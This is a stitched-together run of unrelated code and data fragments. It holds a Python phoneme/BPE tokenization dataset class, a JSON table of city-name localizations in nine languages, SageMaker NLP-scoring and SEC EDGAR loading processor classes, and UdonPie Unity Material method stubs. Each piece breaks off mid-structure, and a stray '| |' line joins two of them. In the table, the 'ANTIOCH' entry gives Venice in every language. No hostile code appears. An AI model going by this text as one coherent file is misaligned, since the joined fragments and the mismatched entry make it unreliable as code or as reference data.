str_map[phoneme] = ((phoneme+"_B"+" ") * accum_stat[phoneme+"_B"] + \
(phoneme+"_I"+" ") * accum_stat[phoneme+"_I"] + \
(phoneme+"_E"+" ") * accum_stat[phoneme+"_E"] + \
(phoneme+"_S"+" ") * accum_stat[phoneme+"_S"] ).split()
return str_map
def __getitem__(self, index):
phoneme_token,bpe_token = self.data_dict[index]["phoneme"], self.data_dict[index]["bpe"]
return {"id": index, "phoneme": phoneme_token, "bpe":bpe_token, "phoneme_target": phoneme_token}
def get_labels(self, index):
words = self.data_dict[index]["word"]
bpe_token = self.data_process["word"](words)
bpe_token = self.data_process["bpe"](bpe_token)
phoneme_token = []
phoneme_norep_token = []
for word in words:
if word in self.lexicon.keys():
build_string = ''
for s in word:
build_string += s+ " "
phoneme_seq = self.g2p(build_string)
phoneme_seq = [i for i in phoneme_seq if i != ' ' and i!="'"]
phoneme_norep_token.extend(phoneme_seq)
for phoneme in phoneme_seq:
phoneme_token.extend(self.accum_stat[phoneme])
phoneme_token = self.data_process["phoneme"](phoneme_token)
phoneme_norep_token = self.data_process["phoneme"](phoneme_norep_token)
return phoneme_token, bpe_token, phoneme_norep_token
"fr_FR": "Amsterdam",
"it_IT": "Amsterdam",
"ja_JP": "アムステルダム",
"ko_KR": "암스테르담",
"pl_PL": "Amsterdam",
"pt_BR": "Amsterdã",
"ru_RU": "Амстердам"
},
"AMSTERDAM_1": {
"de_DE": "Amsterdam",
"es_ES": "Ámsterdam",
"fr_FR": "Amsterdam",
"it_IT": "Amsterdam",
"ja_JP": "アムステルダム",
"ko_KR": "암스테르담",
"pl_PL": "Amsterdam",
"pt_BR": "Amsterdã",
"ru_RU": "Амстердам"
},
"ANA": {
"de_DE": "Ana",
"es_ES": "Ana",
"fr_FR": "Ana",
"it_IT": "Ana",
"ja_JP": "アナ",
"ko_KR": "아나",
"pl_PL": "Ana",
"pt_BR": "Ana",
"ru_RU": "Ана"
},
"ANASHAN": {
"de_DE": "Anashan",
"es_ES": "Anashan",
"fr_FR": "Anashan",
"it_IT": "Anashan",
"ja_JP": "アナシャン",
"ko_KR": "아나샨",
"pl_PL": "Anashan",
"pt_BR": "Ansam",
"ru_RU": "Анашан"
},
"ANCYRA": {
"de_DE": "Ancyra",
"es_ES": "Ancira",
"fr_FR": "Angora",
"it_IT": "Ankara",
"ja_JP": "アンシラ",
"ko_KR": "앙카라",
"pl_PL": "Ancyra",
"pt_BR": "Ancara",
"ru_RU": "Анкира"
},
"ANDEMATUNNUM": {
"de_DE": "Andematunnum",
"es_ES": "Andematunnum",
"fr_FR": "Andemantunnum",
"it_IT": "Andematunnum",
"ja_JP": "アンデマトゥンヌム",
"ko_KR": "안데마투눔",
"pl_PL": "Andematunnum",
"pt_BR": "Andematunnum",
"ru_RU": "Андематун"
},
"ANGERS": {
"de_DE": "Angers",
"es_ES": "Angers",
"fr_FR": "Angers",
"it_IT": "Angers",
"ja_JP": "アンジェ",
"ko_KR": "앙제",
"pl_PL": "Angers",
"pt_BR": "Angers",
"ru_RU": "Анже"
},
"ANGKOR_BOREI": {
"de_DE": "Angkor Borei",
"es_ES": "Angkor Borei",
"fr_FR": "Angkor Borei",
"it_IT": "Angkor Borei",
"ja_JP": "アンコールバライ",
"ko_KR": "앙코르 보레이",
"pl_PL": "Angkor Borei",
"pt_BR": "Angkor Borei",
"ru_RU": "Ангкор Борей"
},
"ANGKOR_THOM": {
"de_DE": "Angkor Thom",
"es_ES": "Angkor Thom",
"fr_FR": "Angkor Thom",
"it_IT": "Angkor Thom",
"ja_JP": "アンコールトム",
"ko_KR": "앙코르 톰",
"pl_PL": "Angkor Thom",
"pt_BR": "Angkor Thom",
"ru_RU": "Ангкор-Тхом"
},
"ANGKOR_WAT": {
"de_DE": "Angkor Wat",
"es_ES": "Angkor Wat",
"fr_FR": "Angkor Vat",
"it_IT": "Angkor Wat",
"ja_JP": "アンコールワット",
"ko_KR": "앙코르와트",
"pl_PL": "Angkor Wat",
"pt_BR": "Angkor Wat",
"ru_RU": "Ангкор-Ват"
},
"ANGOSTURA": {
"de_DE": "Angostura",
"es_ES": "Angostura",
"fr_FR": "Angostura",
"it_IT": "Angostura",
"ja_JP": "アンゴスチュラ",
"ko_KR": "앙고스투라",
"pl_PL": "Angostura",
"pt_BR": "Angostura",
"ru_RU": "Ангостура"
},
"ANGRA": {
"de_DE": "Angra",
"es_ES": "Angra",
"fr_FR": "Angra do Heroísmo",
"it_IT": "Angra",
"ja_JP": "アングラ",
"ko_KR": "앙그라",
"pl_PL": "Angra",
"pt_BR": "Angra",
"ru_RU": "Ангра"
},
"ANICIUM": {
"de_DE": "Anicium",
"es_ES": "Anicium",
"fr_FR": "Anicium",
"it_IT": "Anicium",
"ja_JP": "アニシウム",
"ko_KR": "아니키움",
"pl_PL": "Anicium",
"pt_BR": "Anicium",
"ru_RU": "Анициум"
},
"ANINDITAPURA": {
"de_DE": "Aninditapura",
"es_ES": "Aninditapura",
"fr_FR": "Aninditapura",
"it_IT": "Aninditapura",
"ja_JP": "アニンディタプラ",
"ko_KR": "아닌디타푸라",
"pl_PL": "Aninditapura",
"pt_BR": "Aninditapura",
"ru_RU": "Аниндитапура"
},
"ANKARA": {
"de_DE": "Ankara",
"es_ES": "Ankara",
"fr_FR": "Ankara",
"it_IT": "Ankara",
"ja_JP": "アンカラ",
"ko_KR": "앙카라",
"pl_PL": "Ankara",
"pt_BR": "Ancara",
"ru_RU": "Анкара"
},
"ANKOBER": {
"de_DE": "Ankober",
"es_ES": "Ankober",
"fr_FR": "Ankober",
"it_IT": "Ankober",
"ja_JP": "アンコベル",
"ko_KR": "앙코베르",
"pl_PL": "Ankober",
"pt_BR": "Ankober",
"ru_RU": "Анкобэр"
},
"ANTALO": {
"de_DE": "Antalo",
"es_ES": "Hintalo",
"fr_FR": "Antalo",
"it_IT": "Antalo",
"ja_JP": "アンタロ",
"ko_KR": "안탈로",
"pl_PL": "Antalo",
"pt_BR": "Antalo",
"ru_RU": "Антало"
},
"ANTANANARIVO": {
"de_DE": "Antananarivo",
"es_ES": "Antananarivo",
"fr_FR": "Antananarivo",
"it_IT": "Antananarivo",
"ja_JP": "アンタナナリボ",
"ko_KR": "안타나나리보",
"pl_PL": "Antananarywa",
"pt_BR": "Antananarivo",
"ru_RU": "Антананариву"
},
"ANTAWAYLLA": {
"de_DE": "Antawaylla",
"es_ES": "Antawaylla",
"fr_FR": "Antawaylla",
"it_IT": "Antawaylla",
"ja_JP": "アンタワイラ",
"ko_KR": "안타바일라",
"pl_PL": "Antawaylla",
"pt_BR": "Andahuaylas",
"ru_RU": "Антавайлья"
},
"ANTIGUA": {
"de_DE": "Antigua",
"es_ES": "Antigua",
"fr_FR": "Antigua",
"it_IT": "Antigua",
"ja_JP": "アンティグア",
"ko_KR": "안티구아",
"pl_PL": "Antigua",
"pt_BR": "Antígua",
"ru_RU": "Антигуа"
},
"ANTIOCH": {
"de_DE": "Venedig",
"es_ES": "Venecia",
"fr_FR": "Venise",
"it_IT": "Venezia",
"ja_JP": "ヴェネツィア",
"ko_KR": "베네치아",
"pl_PL": "Wenecja",
"pt_BR": "Veneza",
"ru_RU": "Венеция"
},
"ANTIOCH_BYZANTIUM": {
"de_DE": "Antiochia",
"es_ES": "Antioquía",
"fr_FR": "Antioche",
"it_IT": "Antiochia",
"ja_JP": "アンティオキア",
"ko_KR": "안디옥",
"pl_PL": "Antiochia",
"pt_BR": "Antioquia",
"ru_RU": "Антиохия"
},
"ANTIUM": {
"de_DE": "Antium",
"es_ES": "Antium",
"fr_FR": "Antium",
"it_IT": "Anzio",
"ja_JP": "アンティウム",
"ko_KR": "안티움",
"pl_PL": "Antium",
"pt_BR": "Antium",
"ru_RU": "Анций"
},
"ANTWERP": {
"de_DE": "Antwerpen",
"es_ES": "Amberes",
"fr_FR": "Antwerp",
"it_IT": "Anversa",
"ja_JP": "アントワープ",
"ko_KR": "앤트워프",
"pl_PL": "Antwerpia",
"pt_BR": "Antuérpia",
"ru_RU": "Антверпен"
},
"AOMORI": {
"de_DE": "Aomori",
"es_ES": "Aomori",
"fr_FR": "Aomori",
"it_IT": "Aomori",
"ja_JP": "青森",
"ko_KR": "아오모리",
"pl_PL": "Aomori",
"pt_BR": "Aomori",
"ru_RU": "Аомори"
},
"APELDOORN": {
"de_DE": "Apeldoorn",
"es_ES": "Apeldoorn",
"fr_FR": "Apeldoorn",
"it_IT": "Apeldoorn",
"ja_JP": "アペルドールン",
"ko_KR": "아펠도른",
"pl_PL": "Apeldoorn",
"pt_BR": "Apeldoorn",
"ru_RU": "Апелдорн"
},
"APOLLONIA": {
"de_DE": "Apollonia",
"es_ES": "Apolonia",
"fr_FR": "Apollonia",
"it_IT": "Apollonia",
"ja_JP": "アポロニア",
"ko_KR": "아폴로니아",
"pl_PL": "Apollonia",
"pt_BR": "Apolônia",
"ru_RU": "Аполлония"
},
"APOLYTON": {
"de_DE": "Apolyton",
"es_ES": "Apolyton",
"fr_FR": "Apolyton",
"it_IT": "Apolyton",
"ja_JP": "アポリュトン",
"ko_KR": "아폴리튼",
"pl_PL": "Apolyton",
"pt_BR": "Apolyton",
"ru_RU": "Аполитон"
},
"APU": {
"de_DE": "Apu",
"es_ES": "Apu",
"fr_FR": "Apu",
"it_IT": "Apu",
"ja_JP": "アプ",
"ko_KR": "아푸",
"pl_PL": "Apu",
"pt_BR": "Apu",
"ru_RU": "Апу"
},
"AQABA": {
"de_DE": "Akaba",
"es_ES": "Áqaba",
"fr_FR": "Aqaba",
"it_IT": "Aqaba",
"ja_JP": "アカバ",
"ko_KR": "아카바",
"pl_PL": "Akwaba",
"pt_BR": "Aqaba",
"ru_RU": "Акаба"
},
"AQUILEIA": {
"de_DE": "Aquileia",
"es_ES": "Aquileia",
"fr_FR": "Aquileia",
"it_IT": "Aquileia",
"ja_JP": "アクイレイア",
"ko_KR": "아퀼레이아",
"pl_PL": "Akwileja",
"pt_BR": "Aquileia",
"ru_RU": "Аквилея"
},
"ARACAJU": {
"de_DE": "Aracaju",
"es_ES": "Aracaju",
"fr_FR": "Aracaju",
"it_IT": "Aracaju",
"ja_JP": "アラカジュ",
"ko_KR": "아라카주",
"pl_PL": "Aracaju",
"pt_BR": "Aracaju",
"ru_RU": "Аракажу"
},
"ARAWAN": {
"de_DE": "Arawan",
"es_ES": "Arawan",
"fr_FR": "Arawan",
"it_IT": "Arawan",
"ja_JP": "アラワン",
"ko_KR": "아라완",
"pl_PL": "Arawan",
"pt_BR": "Arawan",
"ru_RU": "Араван"
},
"ARCADIOPOLIS": {
"de_DE": "Arkadiopolis",
"es_ES": "Arcadiópolis",
"fr_FR": "Arcadiopolis",
"it_IT": "Arcadiopoli",
"ja_JP": "アルカディオポリス",
"ko_KR": "아르카디오폴리스",
"pl_PL": "Arcadiopolis",
"pt_BR": "Arcadiopolis",
"ru_RU": "Аркадиополь"
},
"AREGENUA": {
"de_DE": "Aregenua",
"es_ES": "Aregenua",
"fr_FR": "Aregenua",
"it_IT": "Aregenua",
"ja_JP": "アレゲヌア",
"ko_KR": "아레헤누아",
"pl_PL": "Aregenua",
"pt_BR": "Aregenua",
"ru_RU": "Арегенуя"
},
"ARGOS": {
"de_DE": "Argos",
"es_ES": "Argos",
"fr_FR": "Argos",
"it_IT": "Argo",
"ja_JP": "アルゴス",
"ko_KR": "아르고스",
"pl_PL": "Argos",
"pt_BR": "Argos",
"ru_RU": "Аргос"
},
"ARKHANGELSK": {
"de_DE": "Archangelsk",
"es_ES": "Arkhangelsk",
"fr_FR": "Arkhangelsk",
"it_IT": "Arkhangelsk",
"ja_JP": "アルハンゲリスク",
"ko_KR": "아르한겔스크",
"pl_PL": "Archangielsk",
"pt_BR": "Arkhangelsk",
"ru_RU": "Архангельск"
},
"ARMAGH": {
"de_DE": "Armagh",
"es_ES": "Armagh",
"fr_FR": "Armagh",
"it_IT": "Armagh",
"ja_JP": "アーマー",
"ko_KR": "아마",
"pl_PL": "Armagh",
"pt_BR": "Armagh",
"ru_RU": "Арма"
},
"ARNHEM": {
"de_DE": "Arnheim",
"es_ES": "Arnhem",
"fr_FR": "Arnhem",
"it_IT": "Arnhem",
"ja_JP": "アーネム",
"ko_KR": "아른험",
"pl_PL": "Arnhem",
"pt_BR": "Arnhem",
"ru_RU": "Арнем"
},
"ARPINUM": {
"de_DE": "Arpinum",
"es_ES": "Arpinum",
"fr_FR": "Arpinum",
"it_IT": "Arpino",
"ja_JP": "アルピヌム",
"ko_KR": "아르피움",
"pl_PL": "Arpinum",
"pt_BR": "Arpinum",
"ru_RU": "Арпин"
},
"ARRETIUM": {
"de_DE": "Arretium",
"es_ES": "Arretium",
"fr_FR": "Arretium",
"it_IT": "Arezzo",
"ja_JP": "アレティウム",
"ko_KR": "아레티움",
"pl_PL": "Arretium",
"pt_BR": "Arretium",
"ru_RU": "Арреций"
},
"ARSINOE": {
"de_DE": "Arsinoe",
"es_ES": "Arsínoe",
"fr_FR": "Arsinoé",
"it_IT": "Arsinoe",
"ja_JP": "アルシノエ",
"ko_KR": "아르시노에",
"pl_PL": "Arsinoe",
"pt_BR": "Arsinoe",
"ru_RU": "Арсиноя"
},
"ARTASHAT": {
"de_DE": "Artaschat",
"es_ES": "Artashat",
"fr_FR": "Artashat",
"it_IT": "Artashat",
"ja_JP": "アルタシャト",
"ko_KR": "아르타샷",
"pl_PL": "Artaszat",
"pt_BR": "Artaxata",
"ru_RU": "Арташат"
},
"ARTAXATA": {
"de_DE": "Artaxata",
"es_ES": "Artaxata",
"fr_FR": "Artaxata",
"it_IT": "Artaxata",
"ja_JP": "アルタクサタ",
"ko_KR": "아르탁사타",
"pl_PL": "Artaszat",
"pt_BR": "Artaxata",
"ru_RU": "Арташат"
},
"ARUBA": {
"de_DE": "Aruba",
"es_ES": "Aruba",
"fr_FR": "Aruba",
"it_IT": "Aruba",
"ja_JP": "アルバ",
"ko_KR": "아루바",
"pl_PL": "Aruba",
"pt_BR": "Aruba",
"ru_RU": "Аруба"
},
"ARZHAN": {
"de_DE": "Arschan",
"es_ES": "Arzhan",
"fr_FR": "Arzhan",
"it_IT": "Arzhan",
"ja_JP": "アルジャアン",
"ko_KR": "아르잔",
"pl_PL": "Arżan",
"pt_BR": "Arzhan",
"ru_RU": "Аржан"
},
"AR_RAQQAH": {
"de_DE": "Ar-Raqqa",
"es_ES": "Ar-Raqqah",
"fr_FR": "Racca",
"it_IT": "Ar-Raqqah",
"ja_JP": "アル=ラッカ",
"ko_KR": "아르라카",
"pl_PL": "Ar-Raqqah",
"pt_BR": "Ar-Raqqah",
"ru_RU": "Эр-Ракка"
},
"ASSEN": {
"de_DE": "Assen",
"es_ES": "Assen",
"fr_FR": "Assen",
"it_IT": "Assen",
"ja_JP": "アッセン",
"ko_KR": "아선",
"pl_PL": "Assen",
"pt_BR": "Assen",
"ru_RU": "Ассен"
},
"ASTRAKHAN": {
"de_DE": "Astrachan",
"es_ES": "Astracán",
"fr_FR": "Astrakhan",
"it_IT": "Astrakhan",
"ja_JP": "アストラハン",
"ko_KR": "아스트라한",
"pl_PL": "Astrachań",
"pt_BR": "Astracã",
"ru_RU": "Астрахань"
},
"ASYUT": {
"de_DE": "Asyut",
"es_ES": "Asiut",
"fr_FR": "Asyut",
"it_IT": "Asyut",
"ja_JP": "アシュート",
"ko_KR": "아시우트",
"pl_PL": "Asjut",
"pt_BR": "Assiut",
"ru_RU": "Асьют"
},
"ATHENS": {
"de_DE": "Athen",
"es_ES": "Atenas",
"fr_FR": "Athènes",
"it_IT": "Atene",
"ja_JP": "アテネ",
"ko_KR": "아테네",
"pl_PL": "Ateny",
"pt_BR": "Atenas",
"ru_RU": "Афины"
},
"ATLANTA": {
"de_DE": "Atlanta",
"es_ES": "Atlanta",
"fr_FR": "Atlanta",
"it_IT": "Atlanta",
"ja_JP": "アトランタ",
"ko_KR": "애틀란타",
"pl_PL": "Atlanta",
"pt_BR": "Atlanta",
"ru_RU": "Атланта"
},
"ATTALEA": {
"de_DE": "Attalea",
"es_ES": "Attalea",
"fr_FR": "Attaleia",
"it_IT": "Attalea",
"ja_JP": "アッタレア",
"ko_KR": "아탈레아",
"pl_PL": "Attalea",
"pt_BR": "Attalea",
"ru_RU": "Атталея"
},
"ATZCAPOTZALCO": {
"de_DE": "Atzcapotzalco",
"es_ES": "Atzcapotzalco",
"fr_FR": "Atzcapotzalco",
"it_IT": "Atzcapotzalco",
"ja_JP": "アスカポツァルコ",
"ko_KR": "아츠카포찰코",
"pl_PL": "Atzcapotzalco",
"pt_BR": "Atzcapotzalco",
"ru_RU": "Аскапоцалько"
},
"AUCKLAND": {
"de_DE": "Auckland",
"es_ES": "Auckland",
"fr_FR": "Auckland",
"it_IT": "Auckland",
"ja_JP": "オークランド",
"ko_KR": "오클랜드",
"pl_PL": "Auckland",
"pt_BR": "Auckland",
"ru_RU": "Окленд"
},
"AUGSBURG": {
"de_DE": "Augsburg",
"es_ES": "Augsburgo",
"fr_FR": "Augsbourg",
"it_IT": "Augusta",
"ja_JP": "アウクスブルク",
"ko_KR": "아우크스부르크",
"pl_PL": "Augsburg",
"pt_BR": "Augsburgo",
"ru_RU": "Аугсбург"
},
"AUTRICUM": {
"de_DE": "Autricum",
"es_ES": "Autricum",
"fr_FR": "Autricum",
"it_IT": "Autricum",
"ja_JP": "アウトリクム",
"ko_KR": "아우트리쿰",
"pl_PL": "Autricum",
"pt_BR": "Autricum",
"ru_RU": "Аутрикум"
},
"AVALDSNES": {
"de_DE": "Avaldsnes",
"es_ES": "Avaldsnes",
"fr_FR": "Avaldsnes",
"it_IT": "Avaldsnes",
"ja_JP": "アバルドネス",
"ko_KR": "아발스네스",
"pl_PL": "Avaldsnes",
"pt_BR": "Avaldsnes",
"ru_RU": "Авальдснес"
},
"AVARICUM": {
"de_DE": "Avaricum",
"es_ES": "Avárico",
"fr_FR": "Avaricum",
"it_IT": "Avaricum",
"ja_JP": "アウァリクム",
"ko_KR": "아바리쿰",
"pl_PL": "Avaricum",
"pt_BR": "Avaricum",
"ru_RU": "Аварикум"
},
"AVIGNON": {
"de_DE": "Avignon",
"es_ES": "Aviñón",
"fr_FR": "Avignon",
"it_IT": "Avignone",
"ja_JP": "アヴィニョン",
"ko_KR": "아비뇽",
"pl_PL": "Awinion",
"pt_BR": "Avignon",
"ru_RU": "Авиньон"
},
"AWDAGHUST": {
"de_DE": | |
and phrases that are related to the provided
word lists will receive high scores while text that is unrelated will score lower.
    The NLP scores report the percentage of words in a document that match
    a list of words, which is called a lexicon.
    Matching is performed after stemming both the document and the lexicon.
    NLP scoring of sentiment is based on the Vader sentiment lexicon.
    NLP scoring of readability is based on the Gunning-Fog index.
For the general processing job configuration parameters of this class,
see the parameters in the
:class:`~smjsindustry.finance.processor.FinanceProcessor` class.
"""
def __init__(
self,
role: str,
instance_count: int,
instance_type: str,
volume_size_in_gb: int = 30,
volume_kms_key: str = None,
output_kms_key: str = None,
max_runtime_in_seconds: int = None,
sagemaker_session: sagemaker.session.Session = None,
tags: List[Dict[str, str]] = None,
network_config: sagemaker.network.NetworkConfig = None,
):
"""Initializes an NLPScorer instance to calculate NLP scores for text.
Args:
role (str): An AWS IAM role name or ARN. Amazon SageMaker Processing
uses this role to access AWS resources, such as
data stored in Amazon S3.
instance_count (int): The number of instances to run
a processing job with.
instance_type (str): The type of EC2 instance to use for
processing, for example, 'ml.c4.xlarge'.
volume_size_in_gb (int): Size in GB of the EBS volume
to use for storing data during processing (default: 30).
volume_kms_key (str): A KMS key for the processing
volume (default: None).
output_kms_key (str): The KMS key ID for processing job outputs (default: None).
max_runtime_in_seconds (int): Timeout in seconds (default: None).
After this amount of time, Amazon SageMaker terminates the job,
regardless of its current status. If `max_runtime_in_seconds` is not
specified, the default value is 24 hours.
sagemaker_session (:class:`~sagemaker.session.Session`):
Session object which manages interactions with Amazon SageMaker and
any other AWS services needed. If not specified, the processor creates
one using the default AWS configuration chain.
tags (List[Dict[str, str]]): List of tags to be passed to the processing job
(default: None). For more, see
https://docs.aws.amazon.com/sagemaker/latest/dg/API_Tag.html.
network_config (:class:`~sagemaker.network.NetworkConfig`):
A :class:`~sagemaker.network.NetworkConfig`
object that configures network isolation, encryption of
inter-container traffic, security group IDs, and subnets.
"""
super(NLPScorer, self).__init__(
role,
instance_count,
instance_type,
volume_size_in_gb=volume_size_in_gb,
volume_kms_key=volume_kms_key,
output_kms_key=output_kms_key,
max_runtime_in_seconds=max_runtime_in_seconds,
sagemaker_session=sagemaker_session,
tags=tags,
base_job_name=NLP_SCORE_JOB_NAME,
network_config=network_config,
)
def calculate(
self,
score_config: NLPScorerConfig,
text_column_name: str,
input_file_path: str,
s3_output_path: str,
output_file_name: str,
wait: bool = True,
logs: bool = True,
):
"""Runs a processing job to generate NLP scores for input text.
Args:
score_config (:class:`~smjsindustry.NLPScorerConfig`):
The config for the NLP scorer.
            text_column_name (str): The name of the column containing the text to be scored.
            input_file_path (str): The input file path pointing to the input dataframe
                containing the text to be scored. It can be a local path or an S3 path.
s3_output_path (str): An S3 prefix in the format of
``'s3://<output bucket name>/output/path'``.
output_file_name (str): The output file name. The full path is
``'s3://<output bucket name>/output/path/output_file_name'``.
wait (bool): Whether the call should wait until the job completes (default: ``True``).
logs (bool): Whether to show the logs produced by the job (default: ``True``).
Raises:
ValueError: if ``logs`` is True but ``wait`` is False.
"""
parse_result = urlparse(s3_output_path)
if parse_result.scheme != "s3":
raise Exception(
"Expected an S3 prefix in the format of s3://<output bucket name>/output/path"
)
with tempfile.TemporaryDirectory() as tmpdirname:
score_config_file = os.path.join(tmpdirname, self._CONFIG_FILE)
with open(score_config_file, "w") as file_handle:
cloned_config = copy.deepcopy(score_config.get_config())
cloned_config["text_column_name"] = text_column_name
cloned_config["output_file_name"] = output_file_name
json.dump(cloned_config, file_handle)
config_input = ProcessingInput(
source=tmpdirname,
destination=self._PROCESSING_CONFIG,
input_name=self._CONFIG_INPUT_NAME,
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
data_input = ProcessingInput(
source=input_file_path,
destination=self._PROCESSING_DATA,
input_name=self._DATA_INPUT_NAME,
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
result_output = ProcessingOutput(
source=self._PROCESSING_OUTPUT,
destination=s3_output_path,
s3_upload_mode="EndOfJob",
)
logger.info("Starting SageMaker processing job to calculate NLP scores")
super().run(
inputs=[config_input, data_input],
outputs=[result_output],
wait=wait,
logs=logs,
)
logger.info("Completed SageMaker processing job to calculate NLP scores")
class DataLoader(FinanceProcessor):
"""Initializes a DataLoader instance to load a dataset.
For the general processing job configuration parameters of this class,
see the parameters in the
:class:`~smjsindustry.finance.processor.FinanceProcessor` class.
The following ``load`` class method with
:class:`~smjsindustry.finance.EDGARDataSetConfig`
downloads SEC XML filings from the `SEC EDGAR database <https://www.sec.gov/edgar/>`_
and parses the downloaded XML filings to plain text files.
"""
def __init__(
self,
role: str,
instance_count: int,
instance_type: str,
volume_size_in_gb: int = 30,
volume_kms_key: str = None,
output_kms_key: str = None,
max_runtime_in_seconds: int = None,
sagemaker_session: sagemaker.session.Session = None,
tags: List[Dict[str, str]] = None,
network_config: sagemaker.network.NetworkConfig = None,
):
"""Initializes a DataLoader instance to load data from the `SEC EDGAR database <https://www.sec.gov/edgar/>`_.
Args:
role (str): An AWS IAM role name or ARN. Amazon SageMaker Processing
uses this role to access AWS resources, such as
data stored in Amazon S3.
instance_count (int): The number of instances to run
a processing job with.
instance_type (str): The type of EC2 instance to use for
processing, for example, 'ml.c4.xlarge'.
volume_size_in_gb (int): Size in GB of the EBS volume
to use for storing data during processing (default: 30).
volume_kms_key (str): A KMS key for the processing
volume (default: None).
output_kms_key (str): The KMS key ID for processing job outputs (default: None).
max_runtime_in_seconds (int): Timeout in seconds (default: None).
After this amount of time, Amazon SageMaker terminates the job,
regardless of its current status. If `max_runtime_in_seconds` is not
specified, the default value is 24 hours.
sagemaker_session (:class:`~sagemaker.session.Session`):
Session object which manages interactions with Amazon SageMaker and
any other AWS services needed. If not specified, the processor creates
one using the default AWS configuration chain.
tags (List[Dict[str, str]]): List of tags to be passed to the processing job
(default: None). For more, see
https://docs.aws.amazon.com/sagemaker/latest/dg/API_Tag.html.
network_config (:class:`~sagemaker.network.NetworkConfig`):
A :class:`~sagemaker.network.NetworkConfig`
object that configures network isolation, encryption of
inter-container traffic, security group IDs, and subnets.
"""
if instance_count > 1:
logger.info("Dataloader processing jobs only support 1 instance.")
instance_count = 1
super(DataLoader, self).__init__(
role,
instance_count,
instance_type,
volume_size_in_gb=volume_size_in_gb,
volume_kms_key=volume_kms_key,
output_kms_key=output_kms_key,
max_runtime_in_seconds=max_runtime_in_seconds,
sagemaker_session=sagemaker_session,
tags=tags,
base_job_name=SEC_FILING_RETRIEVAL_JOB_NAME,
network_config=network_config,
)
def load(
self,
dataset_config: EDGARDataSetConfig,
s3_output_path: str,
output_file_name: str,
wait: bool = True,
logs: bool = True,
):
"""Runs a processing job to load dataset from `SEC EDGAR database <https://www.sec.gov/edgar/>`_.
Args:
dataset_config (:class:`~smjsindustry.finance.EDGARDataSetConfig`):
The config for the DataLoader.
s3_output_path (str): An S3 prefix in the format of
``'s3://<output bucket name>/output/path'``.
output_file_name (str): The output file name. The full path is
``'s3://<output bucket name>/output/path/output_file_name'``.
wait (bool): Whether the call should wait until the job completes (default: ``True``).
logs (bool): Whether to show the logs produced by the job (default: ``True``).
Raises:
ValueError: if ``logs`` is True but ``wait`` is False.
"""
parse_result = urlparse(s3_output_path)
if parse_result.scheme != "s3":
raise Exception(
"Expected an S3 prefix in the format of s3://<output bucket name>/output/path"
)
with tempfile.TemporaryDirectory() as tmpdirname:
dataset_config_file = os.path.join(tmpdirname, self._CONFIG_FILE)
with open(dataset_config_file, "w") as file_handle:
cloned_config = copy.deepcopy(dataset_config.get_config())
cloned_config["output_file_name"] = output_file_name
json.dump(cloned_config, file_handle)
config_input = ProcessingInput(
input_name=self._CONFIG_INPUT_NAME,
source=tmpdirname,
destination=self._PROCESSING_CONFIG,
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
result_output = ProcessingOutput(
source=self._PROCESSING_OUTPUT,
destination=s3_output_path,
s3_upload_mode="EndOfJob",
)
logger.info("Starting SageMaker processing job to load dataset")
super().run(
inputs=[config_input],
outputs=[result_output],
wait=wait,
logs=logs,
)
logger.info("Completed SageMaker processing job to load dataset")
class SECXMLFilingParser(FinanceProcessor):
"""Initializes a SECXMLFilingParser instance that parses SEC XML filings.
For the general processing job configuration parameters of this class,
see the parameters in the
:class:`~smjsindustry.finance.processor.FinanceProcessor` class.
The following ``parse`` class method parses user-downloaded SEC XML filings
to plain text files.
"""
def __init__(
self,
role: str,
instance_count: int,
instance_type: str,
volume_size_in_gb: int = 30,
volume_kms_key: str = None,
output_kms_key: str = None,
max_runtime_in_seconds: int = None,
sagemaker_session: sagemaker.session.Session = None,
tags: List[Dict[str, str]] = None,
network_config: sagemaker.network.NetworkConfig = None,
):
"""Initializes a SECXMLFilingParser instance to parse the SEC XML filings.
Args:
role (str): An AWS IAM role name or ARN. Amazon SageMaker Processing
uses this role to access AWS resources, such as
data stored in Amazon S3.
instance_count (int): The number of instances to run
a processing job with.
instance_type (str): The type of EC2 instance to use for
processing, for example, 'ml.c4.xlarge'.
volume_size_in_gb (int): Size in GB of the EBS volume
to use for storing data during processing (default: 30).
volume_kms_key (str): A KMS key for the processing
volume (default: None).
            output_kms_key (str): The KMS key ID for processing job outputs (default: None).
from typing import overload
from UdonPie import System
from UdonPie import UnityEngine
from UdonPie.Undefined import *
class Material:
def __new__(cls, arg1=None):
'''
:returns: Material
:rtype: UnityEngine.Material
'''
pass
@staticmethod
def op_Implicit(arg1):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Equality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Inequality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
@overload
def SetTextureOffset(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def SetTextureOffset(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
def SetTextureOffset(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetTextureScale(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def SetTextureScale(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
def SetTextureScale(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetTextureOffset(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def GetTextureOffset(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
def GetTextureOffset(arg1=None):
pass
@staticmethod
@overload
def GetTextureScale(arg1):
'''
:param arg1: String
:type arg1: System.String or str
